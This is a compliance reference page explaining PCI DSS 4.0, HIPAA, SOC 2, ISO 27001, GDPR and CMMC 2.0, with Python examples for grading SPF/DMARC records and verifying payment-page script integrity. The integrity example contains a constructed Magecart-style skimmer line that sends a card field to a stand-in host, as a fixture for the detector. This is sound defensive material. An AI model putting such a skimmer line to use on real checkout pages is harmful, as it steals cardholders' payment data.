Compliance Regulations
Compliance Research Hub: PCI DSS 4.0, HIPAA, SOC 2, ISO 27001, and GDPR
Compliance and security are related but not identical. Compliance means meeting the minimum requirements of a specific regulatory framework or standard. Security means actually reducing the likelihood and impact of breaches. The most dangerous misconception in cybersecurity is that compliance equals security: organizations that achieve certification but lack the underlying security controls to make those certifications meaningful are well-documented sources of significant breaches.
CyberSanso’s Compliance Research Hub covers the regulatory frameworks security teams encounter most frequently in enterprise environments: PCI DSS 4.0 for payment card data, HIPAA for healthcare information, SOC 2 for SaaS and service providers, ISO 27001 for internationally certifiable information security management, GDPR for EU personal data, and CMMC 2.0 for US defense contractors. Each section explains what the framework requires, who it applies to, what the audit or certification process looks like, and what the penalties for non-compliance are.
Compliance requirements are not static. PCI DSS v4.0 was published in March 2022; v3.2.1 retired on March 31, 2024, and the remaining future-dated v4.0 requirements became mandatory on March 31, 2025, so organizations still assessing against 3.2.1, or still deferring those requirements, are out of compliance. The CMMC program rule (32 CFR Part 170) was finalized in late 2024, and the DFARS acquisition rule that actually places CMMC requirements in contracts followed in 2025, starting a phased rollout. GDPR enforcement has accelerated: Meta received a record 1.2 billion euro fine in 2023, and enforcement actions continue to increase in frequency and size.
PCI DSS 4.0: Payment Card Compliance Requirements
PCI DSS (Payment Card Industry Data Security Standard) 4.0 applies to any organization that stores, processes, or transmits payment card data. It is mandated by the card brands (Visa, Mastercard, American Express, Discover) and enforced through merchant agreements, not government legislation – but non-compliance can result in fines, increased transaction fees, and ultimately loss of the ability to process card payments.
PCI DSS 4.0 key changes from v3.2.1: The major structural change in v4.0 is the customized approach, available for most requirements as an alternative to the defined approach. Under the customized approach an organization may implement a control that differs from the prescribed one, provided it documents a targeted risk analysis showing the control meets the requirement's stated objective; the QSA then has to develop and perform bespoke testing procedures for it, which makes it more expensive to assess than the defined approach. Multi-factor authentication expanded significantly: Requirement 8.4.2 requires MFA for all access into the cardholder data environment, not only administrative or remote access. The minimum password length rose from 7 to 12 characters (8 where a system cannot support 12). A targeted risk analysis (Requirement 12.3.1) must now justify the frequency of every activity the standard lets the entity perform "periodically" rather than on a fixed schedule. Requirement 5.4.1 requires mechanisms to detect and protect personnel against phishing; email authentication (SPF, DKIM, DMARC) is the guidance's named example, so it is the control assessors expect to see, even though the requirement itself does not name a technology. Web application security expanded to address client-side skimming (Magecart-style attacks): Requirement 6.4.3 requires an inventory, authorization, and integrity check of every script on payment pages, and Requirement 11.6.1 requires a change- and tamper-detection mechanism on the HTTP headers and content of those pages.
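The email-authentication posture behind Requirement 5.4.1 is straightforward to check once you can read SPF and DMARC records. The script below is an added example (not CyberSanso's code or anything published by the PCI SSC): it parses constructed TXT records for three hypothetical domains, grades the SPF terminal qualifier, counts SPF DNS lookups against the RFC 7208 limit of 10, and flags a DMARC policy of p=none, a partial pct=, or a missing aggregate-report address. A real check would resolve the TXT records for the domain and _dmarc.<domain> over DNS instead of using the inline samples.

```python
"""Grade a domain's SPF and DMARC records for anti-phishing posture.

Added example, not CyberSanso's or the PCI SSC's code. The records below
are constructed for illustration; a real check would resolve the TXT
records for <domain> and _dmarc.<domain> over DNS."""

import re
from dataclasses import dataclass

# Constructed sample records for hypothetical domains.
SAMPLE_RECORDS = {
    "good.example": {
        "spf": "v=spf1 include:_spf.mail.example ip4:203.0.113.0/24 -all",
        "dmarc": "v=DMARC1; p=reject; rua=mailto:dmarc@good.example; pct=100",
    },
    "monitor-only.example": {
        "spf": "v=spf1 include:_spf.mail.example ~all",
        "dmarc": "v=DMARC1; p=none; rua=mailto:dmarc@monitor-only.example",
    },
    "open.example": {
        "spf": "v=spf1 +all",
        "dmarc": None,  # no _dmarc TXT record published
    },
}

# SPF terms that each cost a DNS lookup; RFC 7208 caps them at 10 per evaluation.
LOOKUP_TERMS = ("include", "a", "mx", "ptr", "exists", "redirect")


@dataclass
class Finding:
    domain: str
    severity: str  # "high", "medium" or "info"
    message: str


def parse_dmarc(record):
    """Split 'v=DMARC1; p=reject; rua=...' into a lower-cased tag dict."""
    tags = {}
    for part in record.split(";"):
        key, _, value = part.strip().partition("=")
        if key:
            tags[key.strip().lower()] = value.strip()
    return tags


def spf_all_qualifier(record):
    """Return the qualifier on the 'all' mechanism: '+', '-', '~' or '?'.

    A bare 'all' means '+all' (pass). Returns None when 'all' is absent,
    which SPF evaluates as neutral for unlisted senders."""
    for term in record.split()[1:]:
        m = re.fullmatch(r"([+\-~?]?)all", term, re.IGNORECASE)
        if m:
            return m.group(1) or "+"
    return None


def spf_lookup_count(record):
    """Count the terms that trigger a DNS lookup during SPF evaluation."""
    count = 0
    for term in record.split()[1:]:
        name = term.lstrip("+-~?").split(":", 1)[0].split("=", 1)[0].split("/", 1)[0]
        if name.lower() in LOOKUP_TERMS:
            count += 1
    return count


def assess_domain(domain, spf, dmarc):
    """Return the findings for one domain; an empty list means no issues found."""
    findings = []
    if not spf or not spf.lower().startswith("v=spf1"):
        findings.append(Finding(domain, "high", "no valid SPF record"))
    else:
        q = spf_all_qualifier(spf)
        if q == "+":
            findings.append(Finding(domain, "high", "SPF '+all' authorizes any sender"))
        elif q in (None, "?"):
            findings.append(Finding(domain, "medium", "SPF ends neutral; unlisted senders are not failed"))
        if spf_lookup_count(spf) > 10:
            findings.append(Finding(domain, "high", "SPF exceeds 10 DNS lookups (permerror, record ignored)"))

    if not dmarc:
        findings.append(Finding(domain, "high", "no DMARC record; spoofed mail is neither quarantined nor rejected"))
    else:
        tags = parse_dmarc(dmarc)
        policy = tags.get("p")
        if tags.get("v", "").upper() != "DMARC1" or policy not in ("none", "quarantine", "reject"):
            findings.append(Finding(domain, "high", "malformed DMARC record"))
        else:
            if policy == "none":
                findings.append(Finding(domain, "medium", "DMARC p=none only monitors; it does not block spoofing"))
            if tags.get("pct", "100") != "100":
                findings.append(Finding(domain, "medium", f"DMARC pct={tags['pct']} applies the policy to only part of the mail"))
            if "rua" not in tags:
                findings.append(Finding(domain, "info", "no rua= aggregate reporting address; failures go unseen"))
    return findings


def assess_all(records):
    """Assess every domain in a {domain: {'spf': ..., 'dmarc': ...}} map."""
    return {d: assess_domain(d, r.get("spf"), r.get("dmarc")) for d, r in records.items()}


if __name__ == "__main__":
    for domain, findings in assess_all(SAMPLE_RECORDS).items():
        print(domain, "OK" if not findings else "")
        for f in findings:
            print(f"  [{f.severity}] {f.message}")
```

A domain at p=none with ~all is the common "we have DMARC" state that still does nothing against spoofing; the assessor conversation usually starts from the monitoring reports (rua=) and moves the policy to quarantine and then reject.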
Compliance deadlines: PCI DSS v4.0 was released in March 2022 and v3.2.1 retired on March 31, 2024. The current published text is v4.0.1 (June 2024), a clarification release that changed wording and guidance but not the requirements or the deadlines; v4.0 itself retired at the end of 2024, so new assessments are performed against v4.0.1. Requirements designated "future-dated" in the original release became mandatory on March 31, 2025, including the expanded MFA requirement (8.4.2), the payment-page script and tamper-detection requirements (6.4.3 and 11.6.1), and the targeted risk analysis requirements (12.3.1). Organizations that have not yet addressed these requirements are currently out of compliance with the standard.
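Requirement 6.4.3 expects an inventory of approved payment-page scripts and a way to confirm each one has not been altered; Subresource Integrity (SRI) hashes are the usual building block. The script below is an added example, not code from CyberSanso or the PCI SSC: it computes SRI integrity values for constructed stand-in script bodies, emits the <script integrity=...> tags for an approved inventory, and detects both a tampered copy of an approved script and a script that is not in the inventory at all, which is what a Magecart injection looks like to this check.

```python
"""Generate and verify Subresource Integrity (SRI) hashes for payment-page
scripts, the mechanism behind PCI DSS v4.0 Requirement 6.4.3.

Added example, not CyberSanso's or the PCI SSC's code. The script bodies
and paths are constructed stand-ins."""

import base64
import hashlib

# Constructed: the approved checkout script, a tampered copy with a
# skimmer appended, and a script nobody authorized.
APPROVED = b"window.checkout = { submit() { /* post the form */ } };\n"
TAMPERED = APPROVED + b"fetch('https://skimmer.invalid/c?d=' + document.forms[0].card.value);\n"
UNLISTED = b"/* injected third-party tag */\n"

# The approved inventory: path -> body that was reviewed and authorized.
INVENTORY = {"/js/checkout.js": APPROVED}


def sri_hash(body, algo="sha384"):
    """Return an SRI integrity value such as 'sha384-<base64 digest>'."""
    if algo not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def script_tag(src, body):
    """Render the <script> tag the payment page should carry for this script."""
    return (f'<script src="{src}" integrity="{sri_hash(body)}" '
            'crossorigin="anonymous"></script>')


def verify_page(inventory, fetched):
    """Compare the scripts actually served (path -> body) with the inventory.

    Returns a dict of path -> reason for every script that should be
    blocked: a hash mismatch (tampered) or a path not in the inventory."""
    problems = {}
    for src, body in fetched.items():
        if src not in inventory:
            problems[src] = "not in approved inventory"
        elif sri_hash(body) != sri_hash(inventory[src]):
            problems[src] = "integrity mismatch"
    return problems


if __name__ == "__main__":
    for src, body in INVENTORY.items():
        print(script_tag(src, body))
    served = {"/js/checkout.js": TAMPERED, "/js/tag.js": UNLISTED}
    for src, reason in verify_page(INVENTORY, served).items():
        print(f"BLOCK {src}: {reason}")
```

The browser enforces the integrity attribute on fetch, so a tampered first-party script fails to load; the inventory comparison covers the other half of the requirement, scripts that appear on the page without ever being authorized. A separate 11.6.1 control still has to watch the served page for new script tags, since a skimmer injected into the HTML itself carries no integrity attribute to fail.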
Scope reduction: PCI DSS scope – the systems and processes subject to its requirements – is one of the most complex aspects of compliance. Organizations can reduce scope through network segmentation (isolating the cardholder data environment from out-of-scope systems, with the segmentation controls themselves then in scope and subject to penetration testing), tokenization (replacing card data with tokens before storage), and point-to-point encryption (P2PE) solutions that keep cleartext card data from ever reaching merchant systems. The assessed entity, not the assessor, is responsible for defining its scope and confirming it at least every 12 months (Requirement 12.5.2); the QSA validates that scope during assessment. Scope decisions directly drive compliance cost.
- PCI DSS 4.0 requirements with March 2025 compliance deadline details
- HIPAA Security Rule: technical, physical, and administrative safeguards
- SOC 2 Type 1 vs Type 2: what each report proves and to whom
- ISO 27001 and GDPR: certification and regulatory compliance guidance
HIPAA, SOC 2, and ISO 27001: Healthcare, SaaS, and Enterprise Compliance
HIPAA Security Rule: The HIPAA Security Rule requires covered entities (healthcare providers, health plans, healthcare clearinghouses) and their business associates to implement administrative, physical, and technical safeguards to protect electronic protected health information (ePHI). Technical safeguards require: access controls limiting ePHI access to authorized users, audit controls recording access and activity on systems containing ePHI, integrity controls ensuring ePHI has not been improperly altered or destroyed, and transmission security protecting ePHI in transit. HIPAA does not prescribe specific technologies – it defines required capabilities that organizations must implement through appropriate means. Its implementation specifications are either "required" or "addressable"; addressable does not mean optional, it means the organization must implement the specification or document why an alternative is reasonable and appropriate. The average healthcare data breach costs $7.42 million – the highest of any sector for the 15th consecutive year (IBM Cost of a Data Breach 2025). Healthcare organizations should reference the HIPAA Security Risk Assessment tool from HHS.gov and NIST SP 800-66r2 for HIPAA implementation guidance.
SOC 2: SOC 2 (System and Organization Controls 2) is an attestation framework developed by the American Institute of CPAs (AICPA) under which a licensed CPA firm reports on a service provider's controls against the Trust Services Criteria: security, availability, processing integrity, confidentiality, and privacy. Security (the common criteria) is always in scope; the other four are included only if the organization chooses them, so two SOC 2 reports can cover very different ground. The result is an auditor's report, not a certificate: there is no "SOC 2 certified". SOC 2 Type 1 reports assess whether controls are suitably designed at a specific point in time. SOC 2 Type 2 reports assess whether those controls operated effectively over a defined period (typically 6 to 12 months, with 3 months accepted for a first report). Enterprise customers consistently request SOC 2 Type 2 reports because Type 1 only demonstrates design, not operation. SOC 2 is particularly important for SaaS companies, managed service providers, and cloud infrastructure providers. Implementation typically takes 6 to 12 months for initial Type 2 coverage. Cost ranges from $30,000 to $100,000+ depending on scope and auditor.
ISO 27001: ISO/IEC 27001:2022 is the international standard for Information Security Management Systems (ISMS); its Annex A lists 93 controls, restructured from the 114 in the 2013 edition, and the transition period for 2013 certificates ended on October 31, 2025. Unlike SOC 2, ISO 27001 is internationally recognized and accepted by enterprise customers across geographies. Certification involves implementing an ISMS, conducting internal audits and a management review, completing a Stage 1 documentation review by an accredited certification body, and a Stage 2 audit assessing implementation effectiveness. Initial certification typically takes 12 to 18 months and costs $25,000 to $80,000 for small to mid-size organizations. Surveillance audits occur annually; full recertification every three years. ISO 27001 maps closely to the SOC 2 Trust Services Criteria – organizations often pursue both simultaneously to serve US and international markets.
GDPR: Data Protection Compliance for Organizations Handling EU Personal Data
The GDPR (General Data Protection Regulation) applies to any organization established in the EU that processes personal data, and, under Article 3(2), to organizations outside the EU that offer goods or services to people in the EU or monitor their behaviour – regardless of where the organization is headquartered. A US company profiling the behaviour of EU website visitors, a Canadian SaaS provider with EU enterprise customers, or an Australian company with EU employees all fall within GDPR scope.
GDPR Article 32 security requirements: Article 32 requires appropriate technical and organizational security measures commensurate with the risk to data subjects. Explicitly mentioned measures include pseudonymization and encryption of personal data, ensuring ongoing confidentiality, integrity, availability, and resilience of processing systems, the ability to restore data availability and access in a timely manner following a physical or technical incident, and a process for regularly testing and evaluating security measures. Article 32 does not prescribe specific controls – it requires a risk-proportionate approach that organizations must document and justify.
Data breach notification: GDPR Article 33 requires notification to the relevant supervisory authority within 72 hours of becoming aware of a personal data breach, unless the breach is unlikely to result in a risk to individuals; every breach, notified or not, must still be documented internally (Article 33(5)). Article 34 requires direct notification to affected individuals when the breach is likely to result in a high risk. These timelines are significantly shorter than US state breach notification laws (which typically allow 30 to 60 days, or "without unreasonable delay") and require detection and response processes that can identify, assess, and escalate an incident within the notification window – the 72-hour clock starts at awareness, not at the end of the investigation, so an initial notification may be filed and supplemented later.
GDPR enforcement trends: GDPR enforcement has accelerated significantly. Meta received a 1.2 billion euro fine in 2023 for transferring EU user data to the US without adequate protections. Total GDPR fines exceeded 4 billion euros through 2024, with the volume and size of fines increasing year-over-year as supervisory authorities build their capacity and coordination. The Irish Data Protection Commission (which handles GDPR enforcement for companies like Meta, Google, and Apple with their EU headquarters in Ireland) and the French CNIL have been the most active enforcement authorities.
CMMC 2.0 and US Defense Contractor Compliance
The Cybersecurity Maturity Model Certification (CMMC) 2.0 is the US Department of Defense's mandatory cybersecurity compliance framework for defense industrial base (DIB) contractors. The program rule (32 CFR Part 170) was finalized in late 2024, and the separate DFARS acquisition rule that inserts CMMC requirements into solicitations and contracts followed in 2025, beginning a phased rollout in which the required level appears in contracts as they are awarded.
CMMC 2.0 levels: CMMC 2.0 simplified the original five-level model to three levels. Level 1 (Foundational) applies to contractors handling only Federal Contract Information (FCI) – the 15 basic safeguarding requirements of FAR 52.204-21, verified by an annual self-assessment and affirmation. Level 2 (Advanced) applies to contractors handling Controlled Unclassified Information (CUI) – the 110 requirements of NIST SP 800-171, verified either by an annual self-assessment (Level 2 Self, permitted only for a subset of contracts) or by a certification assessment from an authorized third-party assessment organization (C3PAO) every three years, with an annual affirmation in between; most CUI-bearing contracts will require the C3PAO path. Level 3 (Expert) applies to contractors working on the most critical DoD programs – 24 additional requirements from NIST SP 800-172 on top of Level 2, assessed by the government (DIBCAC) every three years.
NIST 800-171 as the foundation: CMMC Level 2 is built on NIST SP 800-171 Rev 2, which provides 110 security requirements across 14 control families; the CMMC rule references Rev 2 specifically, so the newer Rev 3 is not yet the assessment baseline. Organizations that have implemented NIST 800-171 and posted a SPRS (Supplier Performance Risk System) score approaching the maximum of 110 are well-positioned for CMMC Level 2 certification. The 14 control families cover: Access Control, Awareness and Training, Audit and Accountability, Configuration Management, Identification and Authentication, Incident Response, Maintenance, Media Protection, Personnel Security, Physical Protection, Risk Assessment, Security Assessment, System and Communications Protection, and System and Information Integrity.
Who needs CMMC: Any prime contractor or subcontractor in the defense industrial base that handles FCI or CUI must achieve the appropriate CMMC level for the data they handle. This applies to software companies, manufacturers, research organizations, and service providers in the defense supply chain. Companies that have historically relied on self-attestation of NIST 800-171 compliance must now either achieve and maintain an assessed score or obtain third-party certification. The rollout is phased across DoD contract types.